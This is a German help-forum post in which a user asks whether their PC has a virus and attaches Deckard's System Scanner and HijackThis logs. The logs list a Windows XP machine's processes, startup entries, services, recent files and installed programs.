Successfully created a Deckard's System Scanner Restore Point.


-- Last 4 Restore Point(s) --
4: 2008-05-24 18:17:27 UTC - RP227 - Deckard's System Scanner Restore Point
3: 2008-05-24 16:25:22 UTC - RP226 - Systemprüfpunkt
2: 2008-05-23 12:41:00 UTC - RP225 - Deckard's System Scanner Restore Point
1: 2008-05-22 17:40:49 UTC - RP224 - Avira AntiVir Personal - 22.05.2008 19:40


Backed up registry hives.
Performed disk cleanup.



-- HijackThis (run as ***.exe) ---------------------------------------------

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 20:18:22, on 24.05.2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Programme\Avira\AntiVir PersonalEdition Classic\sched.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\Programme\Sony Ericsson\Mobile2\File Manager\fmgrsrv.exe
C:\Programme\Sony Ericsson\Mobile\Mobile Phone Monitor\epmworker.exe
C:\Programme\Gemeinsame Dateien\Teleca Shared\CapabilityManager.exe
C:\Programme\Java\jre1.5.0_09\bin\jusched.exe
C:\Programme\Sony Ericsson\Mobile2\Application Launcher\Application Launcher.exe
C:\Programme\Mindjet\MindManager 6\MMReminderService.exe
C:\Programme\QuickTime\qttask.exe
C:\Programme\Avira\AntiVir PersonalEdition Classic\avgnt.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Programme\Tracker Software\PDF-XChange 3\pdfSaver\pdfSaver3.exe
C:\Programme\Messenger\msmsgs.exe
C:\Programme\Gemeinsame Dateien\Teleca Shared\Generic.exe
C:\Programme\Avira\AntiVir PersonalEdition Classic\avguard.exe
C:\Programme\Gemeinsame Dateien\Microsoft Shared\VS7Debug\mdm.exe
C:\Programme\RealVNC\VNC4\WinVNC4.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Dokumente und Einstellungen\***\Desktop\dss.exe
C:\PROGRA~1\TRENDM~1\HIJACK~1\***.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = GMX - E-Mail, FreeMail, Themen- & Shopping-Portal
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = ALICE - Willkommen
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = ALICE - Willkommen
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programme\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre1.5.0_09\bin\ssv.dll
O2 - BHO: CmjBrowserHelperObject Object - {AC41D38F-B56D-40AD-94E0-B493D130C959} - C:\Programme\Mindjet\MindManager 6\Mm6InternetExplorer.dll
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Programme\Java\jre1.5.0_09\bin\jusched.exe"
O4 - HKLM\..\Run: [AnyDVD] C:\DOKUME~1\***\LOKALE~1\Temp\Rar$EX01.398\AnyDVD.exe
O4 - HKLM\..\Run: [Sony Ericsson PC Suite] "C:\Programme\Sony Ericsson\Mobile2\Application Launcher\Application Launcher.exe" /startoptions
O4 - HKLM\..\Run: [MMReminderService] C:\Programme\Mindjet\MindManager 6\MMReminderService.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Programme\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [avgnt] "C:\Programme\Avira\AntiVir PersonalEdition Classic\avgnt.exe" /min
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [pdfSaver3] "C:\Programme\Tracker Software\PDF-XChange 3\pdfSaver\pdfSaver3.exe"
O4 - HKCU\..\Run: [MSMSGS] "C:\Programme\Messenger\msmsgs.exe" /background
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOKALER DIENST')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETZWERKDIENST')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Global Startup: Adobe Reader - Schnellstart.lnk = C:\Programme\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O8 - Extra context menu item: Nach Microsoft &Excel exportieren - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.5.0_09\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Konsole - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.5.0_09\bin\ssv.dll
O9 - Extra button: Send to Mindjet MindManager - {531B9DC0-D8EE-4c76-A6EE-6C1E50569655} - C:\Programme\Mindjet\MindManager 6\Mm6InternetExplorer.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe
O16 - DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} (CKAVWebScan Object) - http://www.kaspersky.com/kos/german/...an_unicode.cab
O23 - Service: Adobe LM Service - Unknown owner - C:\Programme\Gemeinsame Dateien\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: Avira AntiVir Personal – Free Antivirus Planer (AntiVirScheduler) - Avira GmbH - C:\Programme\Avira\AntiVir PersonalEdition Classic\sched.exe
O23 - Service: Avira AntiVir Personal – Free Antivirus Guard (AntiVirService) - Avira GmbH - C:\Programme\Avira\AntiVir PersonalEdition Classic\avguard.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programme\Gemeinsame Dateien\InstallShield\Driver\1150\Intel 32\IDriverT.exe
O23 - Service: iPodService - Apple Computer, Inc. - C:\Programme\iPod\bin\iPodService.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - RealVNC Ltd. - C:\Programme\RealVNC\VNC4\WinVNC4.exe

--
End of file - 5462 bytes

-- File Associations -----------------------------------------------------------

All associations okay.


-- Drivers: 0-Boot, 1-System, 2-Auto, 3-Demand, 4-Disabled ---------------------

R1 ssmdrv - c:\windows\system32\drivers\ssmdrv.sys <Not Verified; AVIRA GmbH; >
R2 ElbyCDIO (ElbyCDIO Driver) - c:\windows\system32\drivers\elbycdio.sys <Not Verified; Elaborate Bytes AG; CDRTools>
R3 AnyDVD - c:\windows\system32\drivers\anydvd.sys <Not Verified; SlySoft, Inc.; AnyDVD>


-- Services: 0-Boot, 1-System, 2-Auto, 3-Demand, 4-Disabled --------------------

R2 AntiVirScheduler (Avira AntiVir Personal – Free Antivirus Planer) - "c:\programme\avira\antivir personaledition classic\sched.exe" <Not Verified; Avira GmbH; AntiVir Workstation>


-- Device Manager: Disabled ----------------------------------------------------

Class GUID: {D45B1C18-C8FA-11D1-9F77-0000F805F530}
Description: Herkömmlicher NT APM-Schnittstellenknoten
Device ID: ROOT\NTAPM\0000
Manufacturer: Microsoft
Name: Herkömmlicher NT APM-Schnittstellenknoten
PNP Device ID: ROOT\NTAPM\0000
Service: NtApm

Class GUID:
Description:
Device ID: DISPLAY\NTATIVMD35\4&38C6FE40&0&80000007&01&00
Manufacturer:
Name:
PNP Device ID: DISPLAY\NTATIVMD35\4&38C6FE40&0&80000007&01&00
Service:

Class GUID: {4D36E97E-E325-11CE-BFC1-08002BE10318}
Description: Netzwerkcontroller
Device ID: PCI\VEN_104C&DEV_9066&SUBSYS_3B041186&REV_00\2&EBB567F&0&68
Manufacturer:
Name: Netzwerkcontroller
PNP Device ID: PCI\VEN_104C&DEV_9066&SUBSYS_3B041186&REV_00\2&EBB567F&0&68
Service:


-- Files created between 2008-04-24 and 2008-05-24 -----------------------------

2008-05-23 14:38:24 0 d-------- C:\Programme\Trend Micro
2008-05-23 11:15:07 0 d-------- C:\WINDOWS\system32\Kaspersky Lab
2008-05-23 10:37:34 0 --a------ C:\Dokumente und Einstellungen\***\msoft25517.exe
2008-05-23 10:37:34 80 --a------ C:\Dokumente und Einstellungen\***\i
2008-05-22 19:41:34 0 d-------- C:\Programme\Avira
2008-05-17 16:24:01 0 d-------- C:\Programme\Haufe
2008-05-16 18:56:33 0 d-------- C:\Programme\MSXML 4.0
2008-05-15 20:08:09 0 d-------- C:\Programme\Gemeinsame Dateien\Alice
2008-05-15 20:07:43 0 d-------- C:\Programme\Alice
2008-04-27 15:00:50 0 d-------- C:\Programme\Gemeinsame Dateien\Risxtd
2008-04-27 14:59:46 0 d-------- C:\Programme\EndNote 8
2008-04-27 14:58:34 0 d-------- C:\Programme\Gemeinsame Dateien\Wise Installation Wizard


-- Find3M Report ---------------------------------------------------------------

2008-05-22 22:27:07 0 d-------- C:\Dokumente und Einstellungen\***\Anwendungsdaten\U3
2008-05-17 18:18:53 2891 --a------ C:\WINDOWS\mozver.dat
2008-05-17 17:48:34 0 d-------- C:\Programme\Gemeinsame Dateien\Adobe
2008-05-17 17:24:11 0 d-------- C:\Dokumente und Einstellungen\***\Anwendungsdaten\AdobeUM
2008-05-17 17:24:11 0 d-------- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Adobe
2008-05-16 20:46:46 0 d-------- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Macromedia
2008-05-16 19:06:34 411266 --a------ C:\WINDOWS\system32\perfh007.dat
2008-05-16 19:06:34 72490 --a------ C:\WINDOWS\system32\perfc007.dat
2008-05-15 20:08:09 0 d-------- C:\Programme\Gemeinsame Dateien
2008-04-27 15:01:11 0 d-------- C:\Dokumente und Einstellungen\***\Anwendungsdaten\EndNote
2008-04-27 14:56:34 0 d-------- C:\Programme\EndNote


-- Registry Dump ---------------------------------------------------------------

*Note* empty entries & legit default entries are not shown


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SunJavaUpdateSched"="C:\Programme\Java\jre1.5.0_09\bin\jusched.exe" [12.10.2006 04:10]
"AnyDVD"="C:\DOKUME~1\***\LOKALE~1\Temp\Rar$EX01.398\AnyDVD.exe" []
"@"="" []
"Sony Ericsson PC Suite"="C:\Programme\Sony Ericsson\Mobile2\Application Launcher\Application Launcher.exe" [26.10.2005 18:17]
"MMReminderService"="C:\Programme\Mindjet\MindManager 6\MMReminderService.exe" [14.12.2006 01:16]
"pdfSaver3"="" []
"QuickTime Task"="C:\Programme\QuickTime\qttask.exe" [31.10.2006 22:34]
"avgnt"="C:\Programme\Avira\AntiVir PersonalEdition Classic\avgnt.exe" [12.02.2008 10:06]

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\WINDOWS\system32\ctfmon.exe" [04.08.2004 14:00]
"pdfSaver3"="C:\Programme\Tracker Software\PDF-XChange 3\pdfSaver\pdfSaver3.exe" [05.09.2004 18:20]
"MSMSGS"="C:\Programme\Messenger\msmsgs.exe" [13.10.2004 18:24]

C:\Dokumente und Einstellungen\All Users\Startmen\Programme\Autostart\
Adobe Reader - Schnellstart.lnk - C:\Programme\Adobe\Acrobat 7.0\Reader\reader_sl.exe [23.04.2008 03:38:16]




-- End of Deckard's System Scanner: finished at 2008-05-24 20:19:00 ------------

Alt 24.05.2008, 20:39   #11
CandyDarling
 
Ist das ein Virus? - Standard

Ist das ein Virus?



DSS Teil 2


Deckard's System Scanner v20071014.68
Extra logfile - please post this as an attachment with your post.
--------------------------------------------------------------------------------

-- System Information ----------------------------------------------------------

Microsoft Windows XP Professional (build 2600) SP 2.0
Architecture: X86; Language: German

CPU 0: Intel Pentium III-Prozessor
Percentage of Memory in Use: 37%
Physical Memory (total/avail): 767.49 MiB / 482.27 MiB
Pagefile Memory (total/avail): 1878.36 MiB / 1608.9 MiB
Virtual Memory (total/avail): 2047.88 MiB / 1944.76 MiB

A: is Removable (No Media)
C: is Fixed (NTFS) - 9.32 GiB total, 1.75 GiB free.
D: is Fixed (NTFS) - 27.95 GiB total, 13.04 GiB free.
E: is Fixed (NTFS) - 48.83 GiB total, 1.33 GiB free.
F: is Fixed (NTFS) - 65.66 GiB total, 12.91 GiB free.
Y: is CDROM (No Media)
Z: is CDROM (No Media)

\\.\PHYSICALDRIVE1 - Maxtor 6B120P0 - 114.49 GiB - 1 partition
\PARTITION0 - Verwaltung logischer Datenträger - 114.49 GiB - E: - F:

\\.\PHYSICALDRIVE0 - ST340823A - 37.27 GiB - 2 partitions
\PARTITION0 (bootable) - Installierbares Dateisystem - 9.32 GiB - C:
\PARTITION1 - Erweitert mit Int 13 (erweitert) - 27.95 GiB - D:



-- Security Center -------------------------------------------------------------

AUOptions is scheduled to auto-install.
Windows Internal Firewall is enabled.

FirstRunDisabled is set.

AV: Avira AntiVir PersonalEdition v8.0.1.15 (Avira GmbH)

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"="%windir%\\system32\\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"="%windir%\\system32\\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"C:\\Programme\\RealVNC\\VNC4\\winvnc4.exe"="C:\\Programme\\RealVNC\\VNC4\\winvnc4.exe:*:Enabled:winvnc4.exe"
"C:\\Programme\\iTunes\\iTunes.exe"="C:\\Programme\\iTunes\\iTunes.exe:*:Enabled:iTunes"
"C:\\WINDOWS\\system32\\ftp.exe"="C:\\WINDOWS\\system32\\ftp.exe:*isabled:Programm zur Dateiübertragung"


-- Environment Variables -------------------------------------------------------

ALLUSERSPROFILE=C:\Dokumente und Einstellungen\All Users
APPDATA=C:\Dokumente und Einstellungen\***\Anwendungsdaten
CLASSPATH=C:\Programme\QuickTime\QTSystem\QTJava.zip
CLIENTNAME=Console
CommonProgramFiles=C:\Programme\Gemeinsame Dateien
COMPUTERNAME=BETSYSPC
ComSpec=C:\WINDOWS\system32\cmd.exe
DEFAULT_CA_NR=CA6
FP_NO_HOST_CHECK=NO
HOMEDRIVE=C:
HOMEPATH=\Dokumente und Einstellungen\***
LOGONSERVER=\\BETSYSPC
NUMBER_OF_PROCESSORS=1
OS=Windows_NT
Path=C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\Programme\QuickTime\QTSystem\;C:\Programme\Gemeinsame Dateien\Teleca Shared
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 8 Stepping 6, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0806
ProgramFiles=C:\Programme
PROMPT=$P$G
QTJAVA=C:\Programme\QuickTime\QTSystem\QTJava.zip
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:\WINDOWS
TEMP=C:\DOKUME~1\***\LOKALE~1\Temp
TMP=C:\DOKUME~1\***\LOKALE~1\Temp
USERDOMAIN=BETSYSPC
USERNAME=***
USERPROFILE=C:\Dokumente und Einstellungen\***
windir=C:\WINDOWS


-- User Profiles ---------------------------------------------------------------

*** (admin)


-- Add/Remove Programs ---------------------------------------------------------

--> C:\Programme\DivX\ConverterUninstall.exe /CONVERTER
--> C:\Programme\Gemeinsame Dateien\Real\Update_OB\r1puninst.exe RealNetworks|RealPlayer|6.0
--> rundll32.exe setupapi.dll,InstallHinfSection DefaultUninstall 132 C:\WINDOWS\INF\PCHealth.inf
101 Fragen und Antworten im Vorstellungsgespräch --> C:\WINDOWS\IsUn0407.exe -fC:\Programme\Haufe\Vorstellungsgespraech\vorstellungsgespraech.isu
Adobe Acrobat 5.0 --> C:\WINDOWS\ISUN0407.EXE -f"C:\Programme\Gemeinsame Dateien\Adobe\Acrobat 5.0\NT\Uninst.isu" -c"C:\Programme\Gemeinsame Dateien\Adobe\Acrobat 5.0\NT\Uninst.dll"
Adobe Flash Player ActiveX --> C:\WINDOWS\system32\Macromed\Flash\uninstall_activeX.exe
Adobe Photoshop CS --> RunDll32 C:\PROGRA~1\GEMEIN~1\INSTAL~1\PROFES~1\RunTime\0701\Intel32\Ctor.dll,LaunchSetup "C:\Programme\InstallShield Installation Information\{EFB21DE7-8C19-4A88-BB28-A766E16493BC}\setup.exe" -l0x7
Adobe Reader 7.1.0 - Deutsch --> MsiExec.exe /I{AC76BA86-7AD7-1031-7B44-A71000000002}
Alice-Installationsdateien entfernen --> C:\Programme\Gemeinsame Dateien\Alice\uninst.exe
AnyDVD --> "C:\Programme\SlySoft\AnyDVD\AnyDVD-uninst.exe" /D="C:\Programme\SlySoft\AnyDVD"
ATI Display Driver --> rundll32 C:\WINDOWS\system32\atiiiexx.dll,_InfEngUnInstallINFFile_RunDLL@16 -force_restart -flags:0x2010001 -inf_classISPLAY -clean
Audiograbber 1.83 SE --> C:\WINDOWS\uninstall\Audiograbber\setup.exe
Avira AntiVir Personal – Free Antivirus --> C:\Programme\Avira\AntiVir PersonalEdition Classic\SETUP.EXE /REMOVE
DasTelefonbuch. Alles in einem. Berlin 2006/2007 --> RunDll32 C:\PROGRA~1\GEMEIN~1\INSTAL~1\engine\6\INTEL3~1\Ctor.dll,LaunchSetup "C:\Programme\InstallShield Installation Information\{2699502B-3FD7-4DF5-90CE-FAC601D05079}\setup.exe"
DasTelefonbuch. Alles in einem. Berlin 2007 --> RunDll32 C:\PROGRA~1\GEMEIN~1\INSTAL~1\engine\6\INTEL3~1\Ctor.dll,LaunchSetup "C:\Programme\InstallShield Installation Information\{3863FC48-9AA2-40A0-8883-C737E348F341}\setup.exe"
DivX Codec --> C:\Programme\DivX\DivXCodecUninstall.exe /CODEC
DivX Converter --> C:\Programme\DivX\ConverterUninstall.exe /CONVERTER
DVD Shrink 3.2 --> "C:\Programme\DVD Shrink\unins000.exe"
EndNote 8.0.1 --> MsiExec.exe /I{27625A79-D272-41EF-844B-6EAC87D4A51E}
EVEREST Home Edition v2.20 --> "C:\Programme\Lavalys\EVEREST Home Edition\unins000.exe"
GelbeSeiten Für Berlin 2006/2007 --> RunDll32 C:\PROGRA~1\GEMEIN~1\INSTAL~1\engine\6\INTEL3~1\Ctor.dll,LaunchSetup "C:\Programme\InstallShield Installation Information\{64EE38A4-8987-48D6-8819-44AB76CF0EDB}\setup.exe"
GelbeSeiten Für Berlin 2007/2008 --> RunDll32 C:\PROGRA~1\GEMEIN~1\INSTAL~1\engine\6\INTEL3~1\Ctor.dll,LaunchSetup "C:\Programme\InstallShield Installation Information\{B5933EBE-3384-4DE8-A5B3-E79536DFC2BD}\setup.exe"
Google Earth --> RunDll32 C:\PROGRA~1\GEMEIN~1\INSTAL~1\PROFES~1\RunTime\11\50\Intel32\Ctor.dll,LaunchSetup "C:\Programme\InstallShield Installation Information\{3DE5E7D4-7B88-403C-A3FD-2017A8240C5B}\setup.exe" -l0x7 -removeonly
Google Toolbar for Firefox --> MsiExec.exe /X{2CCBABCB-6427-4A55-B091-49864623C43F}
HijackThis 2.0.2 --> "C:\Programme\Trend Micro\HijackThis\HijackThis.exe" /uninstall
Hotfix for Windows Media Format SDK (KB902344) --> "C:\WINDOWS\$NtUninstallKB902344$\spuninst\spuninst.exe"
IrfanView (remove only) --> C:\Programme\IrfanView\iv_uninstall.exe
ISI ResearchSoft - Export Helper --> C:\PROGRA~1\GEMEIN~1\Risxtd\_UNINST.EXE
iTunes --> C:\PROGRA~1\GEMEIN~1\INSTAL~1\Driver\11\INTEL3~1\IDriver.exe /M{59C4F14F-7590-45FC-BE9F-A67AB3590709} /l1031
J2SE Runtime Environment 5.0 Update 6 --> MsiExec.exe /I{3248F0A8-6813-11D6-A77B-00B0D0150060}
J2SE Runtime Environment 5.0 Update 9 --> MsiExec.exe /I{3248F0A8-6813-11D6-A77B-00B0D0150090}
Kaspersky Online Scanner --> C:\WINDOWS\system32\Kaspersky Lab\Kaspersky Online Scanner\kavuninstall.exe
Microsoft-Basissmartcard-Kryptografiedienstanbieterpaket --> "C:\WINDOWS\$NtUninstallbasecsp$\spuninst\spuninst.exe"
Microsoft Office XP Professional --> MsiExec.exe /I{90110407-6000-11D3-8CFE-0050048383C9}
Mindjet MindManager Pro 6 --> MsiExec.exe /I{75E9EBCB-4CC8-4D22-A913-373D490A5CDC}
Mozilla Firefox (2.0) --> C:\Programme\Mozilla Firefox\uninstall\uninst.exe
Nero 6 Ultra Edition --> C:\Programme\Ahead\nero\uninstall\UNNERO.exe /UNINSTALL
oggcodecs 0.69.8924 --> C:\Programme\illiminable\oggcodecs\uninst.exe
PDF-XChange 3.0 --> "C:\Programme\Tracker Software\PDF-XChange 3\unins000.exe"
PowerDVD --> RunDll32 C:\PROGRA~1\GEMEIN~1\INSTAL~1\engine\6\INTEL3~1\Ctor.dll,LaunchSetup "C:\Programme\InstallShield Installation Information\{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}\Setup.exe" -uninstall
QuickTime --> C:\PROGRA~1\GEMEIN~1\INSTAL~1\Driver\11\INTEL3~1\IDriver.exe /M{929408E6-D265-4174-805F-81D1D914E2A4} /l1031
RealPlayer --> C:\Programme\Gemeinsame Dateien\Real\Update_OB\r1puninst.exe RealNetworks|RealPlayer|6.0
Sicherheitsupdate für Windows XP (KB890046) --> "C:\WINDOWS\$NtUninstallKB890046$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB893756) --> "C:\WINDOWS\$NtUninstallKB893756$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB896358) --> "C:\WINDOWS\$NtUninstallKB896358$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB896423) --> "C:\WINDOWS\$NtUninstallKB896423$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB896424) --> "C:\WINDOWS\$NtUninstallKB896424$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB896428) --> "C:\WINDOWS\$NtUninstallKB896428$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB899587) --> "C:\WINDOWS\$NtUninstallKB899587$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB899589) --> "C:\WINDOWS\$NtUninstallKB899589$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB899591) --> "C:\WINDOWS\$NtUninstallKB899591$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB900725) --> "C:\WINDOWS\$NtUninstallKB900725$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB901017) --> "C:\WINDOWS\$NtUninstallKB901017$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB901214) --> "C:\WINDOWS\$NtUninstallKB901214$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB902400) --> "C:\WINDOWS\$NtUninstallKB902400$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB904706) --> "C:\WINDOWS\$NtUninstallKB904706$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB905414) --> "C:\WINDOWS\$NtUninstallKB905414$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB905749) --> "C:\WINDOWS\$NtUninstallKB905749$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB908519) --> "C:\WINDOWS\$NtUninstallKB908519$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB911562) --> "C:\WINDOWS\$NtUninstallKB911562$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB911567) --> "C:\WINDOWS\$NtUninstallKB911567$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB911927) --> "C:\WINDOWS\$NtUninstallKB911927$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB912919) --> "C:\WINDOWS\$NtUninstallKB912919$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB913580) --> "C:\WINDOWS\$NtUninstallKB913580$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB914388) --> "C:\WINDOWS\$NtUninstallKB914388$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB914389) --> "C:\WINDOWS\$NtUninstallKB914389$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB917344) --> "C:\WINDOWS\$NtUninstallKB917344$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB917422) --> "C:\WINDOWS\$NtUninstallKB917422$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB917953) --> "C:\WINDOWS\$NtUninstallKB917953$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB918118) --> "C:\WINDOWS\$NtUninstallKB918118$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB918439) --> "C:\WINDOWS\$NtUninstallKB918439$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB918899) --> "C:\WINDOWS\$NtUninstallKB918899$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB919007) --> "C:\WINDOWS\$NtUninstallKB919007$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB920213) --> "C:\WINDOWS\$NtUninstallKB920213$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB920214) --> "C:\WINDOWS\$NtUninstallKB920214$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB920670) --> "C:\WINDOWS\$NtUninstallKB920670$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB920683) --> "C:\WINDOWS\$NtUninstallKB920683$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB920685) --> "C:\WINDOWS\$NtUninstallKB920685$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB921398) --> "C:\WINDOWS\$NtUninstallKB921398$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB921883) --> "C:\WINDOWS\$NtUninstallKB921883$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB922616) --> "C:\WINDOWS\$NtUninstallKB922616$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB922819) --> "C:\WINDOWS\$NtUninstallKB922819$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB923191) --> "C:\WINDOWS\$NtUninstallKB923191$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB923414) --> "C:\WINDOWS\$NtUninstallKB923414$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB923689) --> "C:\WINDOWS\$NtUninstallKB923689$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB923789) --> C:\WINDOWS\system32\MacroMed\Flash\genuinst.exe C:\WINDOWS\system32\MacroMed\Flash\KB923789.inf
Sicherheitsupdate für Windows XP (KB923980) --> "C:\WINDOWS\$NtUninstallKB923980$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB924191) --> "C:\WINDOWS\$NtUninstallKB924191$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB924270) --> "C:\WINDOWS\$NtUninstallKB924270$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB924496) --> "C:\WINDOWS\$NtUninstallKB924496$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB924667) --> "C:\WINDOWS\$NtUninstallKB924667$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB925486) --> "C:\WINDOWS\$NtUninstallKB925486$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB925902) --> "C:\WINDOWS\$NtUninstallKB925902$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB926255) --> "C:\WINDOWS\$NtUninstallKB926255$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB926436) --> "C:\WINDOWS\$NtUninstallKB926436$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB927779) --> "C:\WINDOWS\$NtUninstallKB927779$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB927802) --> "C:\WINDOWS\$NtUninstallKB927802$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB928255) --> "C:\WINDOWS\$NtUninstallKB928255$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB928843) --> "C:\WINDOWS\$NtUninstallKB928843$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB929123) --> "C:\WINDOWS\$NtUninstallKB929123$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB930178) --> "C:\WINDOWS\$NtUninstallKB930178$\spuninst\spuninst.exe"
